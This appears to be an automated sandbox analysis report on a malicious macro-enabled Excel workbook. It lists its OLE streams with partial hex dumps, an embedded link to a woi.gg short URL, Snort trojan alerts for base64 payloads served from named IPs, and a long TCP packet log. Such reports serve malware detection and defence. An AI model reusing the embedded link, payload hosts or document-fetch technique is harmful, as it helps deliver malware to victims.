Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	200
Entropy:	3.2603503175049817
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: MBD000A6F42/\x1CompObj, File Type: data, Stream Size: 113

General
Stream Path:	MBD000A6F42/\x1CompObj
CLSID:
File Type:	data
Stream Size:	113
Entropy:	3.9544012817407785
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . / . . . M i c r o s o f t O f f i c e E x c e l M a c r o - E n a b l e d W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 4d 61 63 72 6f 2d 45 6e 61 62 6c 65 64 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD000A6F42/Package, File Type: Microsoft Excel 2007+, Stream Size: 19824

General
Stream Path:	MBD000A6F42/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	19824
Entropy:	7.58978285472955
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . . - F . . . 0 . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 0b c3 2d c2 46 01 00 00 30 03 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD000A6F43/\x1Ole, File Type: data, Stream Size: 392

General
Stream Path:	MBD000A6F43/\x1Ole
CLSID:
File Type:	data
Stream Size:	392
Entropy:	6.200557461354234
Base64 Encoded:	False
Data ASCII:	. . . . . l . . M . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . : . / . / . w . o . i . . . g . g . / . 1 . R . x . r . R . 6 . . . . I . 4 . > [ . S I 8 . [ 2 . . $ . . { . . 7 6 ! . . ! _ . : . F p ; . . H ' 9 . A @ . . ] . x g 4 y T # & . y P l 4 \\ . . _ . . M I . . 7 . . E X s [ . B i T \| i b # 0 t h v . t i . . . . . . . . . . . . . . . . > . . . k . A . p . b . x . R . X . A . 6 . Z . t . Q . 8 . n . D . k . q . q . 3 . v . b . S . O . 2 . U . x . H . W . 8 . C . . . 0 H ; . - l B ~
Data Raw:	01 00 00 02 b3 f9 af 02 6c 02 00 4d 00 00 00 00 00 00 00 00 00 00 00 00 ea 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b e6 00 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 77 00 6f 00 69 00 2e 00 67 00 67 00 2f 00 31 00 52 00 78 00 72 00 52 00 36 00 00 00 c4 04 ac f5 49 0c 91 c0 bd 34 19 3e f1 5b 15 d0 53 b5 9f 49 38 0a 5b 32 16 f5 a4 0c ce 24 e7 85 dc 9b c9 c4 a6 f1

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 165299

General
Stream Path:	Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	165299
Entropy:	7.9963344580451245
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . \| . . . . . . , . j . 1 , / % _ ( \| n e k . ` * h q ( . . . . . . . . . . \\ . p . , ) z p . 7 . x ( # . . . A . . # & . . . ( . x ) S . p 4 I ^ . . l : n . Y , ; 6 [ . . B I 4 . < b - [ U . U X f B . . . h a . . . x . . . = . . . # k . . . 3 . v 5 P % _ . c . . . . 3 @ . . . . c . . . . . . . . . P . . . ! . . . = . . . = . . ` . . . s . @ . . . . . . . . { " . . . . . . . 5 . . . u J . . . m 1 . . . M q L . . . . p Z W 4 * . v F B . \| 4 1 . . . E 5 .
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 0f 7c 10 13 07 8b f6 1d 89 1d fd c3 17 cb 2c 00 6a 0e f0 31 2c 2f 25 b0 a1 5f da 28 87 b5 7c 6e f5 b9 f0 a7 db 65 8e 6b 0d 60 8a d2 2a 68 71 28 e1 00 02 00 b0 04 c1 00 02 00 b4 cc e2 00 00 00 5c 00 70 00 2c 29 e0 84 7a bc f7 70 fa d0 ba 37 db 06 fb a2 9e af bf 88 bf 78 e3 c4 28 8b 23 ae 05 cb

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 529

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	529
Entropy:	5.284075521145087
Base64 Encoded:	True
Data ASCII:	I D = " { 0 8 E 2 B E C C - 0 E F B - 4 E E 8 - 9 C B 0 - 2 1 E 7 8 C 8 5 7 5 B E } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 6 A 6 8 5 9 9 1 6 7 9 5 6 7 9 5 6
Data Raw:	49 44 3d 22 7b 30 38 45 32 42 45 43 43 2d 30 45 46 42 2d 34 45 45 38 2d 39 43 42 30 2d 32 31 45 37 38 43 38 35 37 35 42 45 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
CLSID:
File Type:	data
Stream Size:	104
Entropy:	3.0488640812019017
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2644
Entropy:	4.006851737445176
Base64 Encoded:	False
Data ASCII:	a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
Data Raw:	cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
CLSID:
File Type:	data
Stream Size:	553
Entropy:	6.376776545384327
Base64 Encoded:	True
Data ASCII:	. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . G h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
Data Raw:	01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 c5 47 97 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/05/24-07:16:46.449686	TCP	2018856	ET TROJAN Windows executable base64 encoded	80	49175	91.92.254.194	192.168.2.22
07/05/24-07:16:42.221283	TCP	2049038	ET TROJAN Malicious Base64 Encoded Payload In Image	80	49174	91.92.254.14	192.168.2.22
07/05/24-07:16:47.671875	TCP	2020423	ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1	80	49176	172.232.56.138	192.168.2.22
07/05/24-07:16:47.671875	TCP	2020424	ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M1	80	49176	172.232.56.138	192.168.2.22
07/05/24-07:16:46.607522	TCP	2047750	ET TROJAN Base64 Encoded MZ In Image	80	49175	91.92.254.194	192.168.2.22
07/05/24-07:16:46.686651	TCP	2049038	ET TROJAN Malicious Base64 Encoded Payload In Image	80	49175	91.92.254.194	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 5, 2024 07:16:25.090358019 CEST	49163	80	192.168.2.22	104.21.11.106
Jul 5, 2024 07:16:25.095171928 CEST	80	49163	104.21.11.106	192.168.2.22
Jul 5, 2024 07:16:25.095244884 CEST	49163	80	192.168.2.22	104.21.11.106
Jul 5, 2024 07:16:25.095359087 CEST	49163	80	192.168.2.22	104.21.11.106
Jul 5, 2024 07:16:25.100528002 CEST	80	49163	104.21.11.106	192.168.2.22
Jul 5, 2024 07:16:25.598357916 CEST	80	49163	104.21.11.106	192.168.2.22
Jul 5, 2024 07:16:25.598458052 CEST	49163	80	192.168.2.22	104.21.11.106
Jul 5, 2024 07:16:25.621181011 CEST	49164	443	192.168.2.22	104.21.11.106
Jul 5, 2024 07:16:25.621227026 CEST	443	49164	104.21.11.106	192.168.2.22
Jul 5, 2024 07:16:25.621282101 CEST	49164	443	192.168.2.22	104.21.11.106
Jul 5, 2024 07:16:25.629759073 CEST	49164	443	192.168.2.22	104.21.11.106
Jul 5, 2024 07:16:25.629785061 CEST	443	49164	104.21.11.106	192.168.2.22
Jul 5, 2024 07:16:26.148971081 CEST	443	49164	104.21.11.106	192.168.2.22
Jul 5, 2024 07:16:26.149070978 CEST	49164	443	192.168.2.22	104.21.11.106
Jul 5, 2024 07:16:26.211980104 CEST	49164	443	192.168.2.22	104.21.11.106
Jul 5, 2024 07:16:26.212004900 CEST	443	49164	104.21.11.106	192.168.2.22
Jul 5, 2024 07:16:26.212472916 CEST	443	49164	104.21.11.106	192.168.2.22
Jul 5, 2024 07:16:26.212543964 CEST	49164	443	192.168.2.22	104.21.11.106
Jul 5, 2024 07:16:26.450948000 CEST	49164	443	192.168.2.22	104.21.11.106
Jul 5, 2024 07:16:26.496514082 CEST	443	49164	104.21.11.106	192.168.2.22
Jul 5, 2024 07:16:27.579426050 CEST	443	49164	104.21.11.106	192.168.2.22
Jul 5, 2024 07:16:27.579592943 CEST	49164	443	192.168.2.22	104.21.11.106
Jul 5, 2024 07:16:27.579626083 CEST	443	49164	104.21.11.106	192.168.2.22
Jul 5, 2024 07:16:27.579679966 CEST	49164	443	192.168.2.22	104.21.11.106
Jul 5, 2024 07:16:27.579698086 CEST	443	49164	104.21.11.106	192.168.2.22
Jul 5, 2024 07:16:27.579756975 CEST	49164	443	192.168.2.22	104.21.11.106
Jul 5, 2024 07:16:27.579819918 CEST	443	49164	104.21.11.106	192.168.2.22
Jul 5, 2024 07:16:27.579873085 CEST	49164	443	192.168.2.22	104.21.11.106
Jul 5, 2024 07:16:27.579885006 CEST	443	49164	104.21.11.106	192.168.2.22
Jul 5, 2024 07:16:27.579930067 CEST	49164	443	192.168.2.22	104.21.11.106
Jul 5, 2024 07:16:27.579982042 CEST	443	49164	104.21.11.106	192.168.2.22
Jul 5, 2024 07:16:27.580049038 CEST	49164	443	192.168.2.22	104.21.11.106
Jul 5, 2024 07:16:27.591902018 CEST	49164	443	192.168.2.22	104.21.11.106
Jul 5, 2024 07:16:27.591938972 CEST	443	49164	104.21.11.106	192.168.2.22
Jul 5, 2024 07:16:27.599992037 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:27.604878902 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:27.604988098 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:27.605067968 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:27.610285997 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.253381968 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.253401995 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.253412008 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.253427982 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.253441095 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.253454924 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.253467083 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.253541946 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.253603935 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.253616095 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.253628016 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.253628969 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.253645897 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.253674984 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.258408070 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.258465052 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.258476973 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.258477926 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.258503914 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.258531094 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.259542942 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.347218990 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.347237110 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.347309113 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.347328901 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.347349882 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.347361088 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.347374916 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.347397089 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.347506046 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.347517014 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.347548962 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.348223925 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.348263979 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.348288059 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.348304033 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.348329067 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.348349094 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.348408937 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.348421097 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.348453999 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.349196911 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.349240065 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.349257946 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.349270105 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.349302053 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.349359989 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.349371910 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.349402905 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.350090027 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.350133896 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.350142956 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.350155115 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.350188971 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.350254059 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.350296021 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.350306988 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.350347042 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.350991011 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.351032972 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.419540882 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.419584990 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.419594049 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.419620037 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.419636011 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.441751003 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.441788912 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.441798925 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.441831112 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.441845894 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.441931963 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.441941977 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.441951990 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.441972971 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.441992044 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.442188978 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.442233086 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.442236900 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.442248106 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.442276955 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.442399025 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.442409992 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.442429066 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.442441940 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.442460060 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.443532944 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.443578005 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.443588972 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.443591118 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.443609953 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.443631887 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.443734884 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.443748951 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.443758011 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.443779945 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.443795919 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.443873882 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.443917036 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.443943024 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.443953037 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.443984985 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.444058895 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.444067955 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.444077015 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.444112062 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.444137096 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.444782019 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.444827080 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.444835901 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.444847107 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.444876909 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.444909096 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.444933891 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.444972992 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.444978952 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.445013046 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.504173994 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.504220963 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.504230976 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.504278898 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.504296064 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.504355907 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.504367113 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:28.504399061 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.504415989 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:28.678210020 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:29.446738005 CEST	49166	80	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:29.451973915 CEST	80	49166	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:29.452065945 CEST	49166	80	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:29.452270985 CEST	49166	80	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:29.457580090 CEST	80	49166	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:29.945837975 CEST	80	49166	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:29.945890903 CEST	49166	80	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:30.223978043 CEST	49166	80	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:30.228791952 CEST	80	49166	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:30.329176903 CEST	80	49166	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:30.329232931 CEST	49166	80	192.168.2.22	172.67.148.197
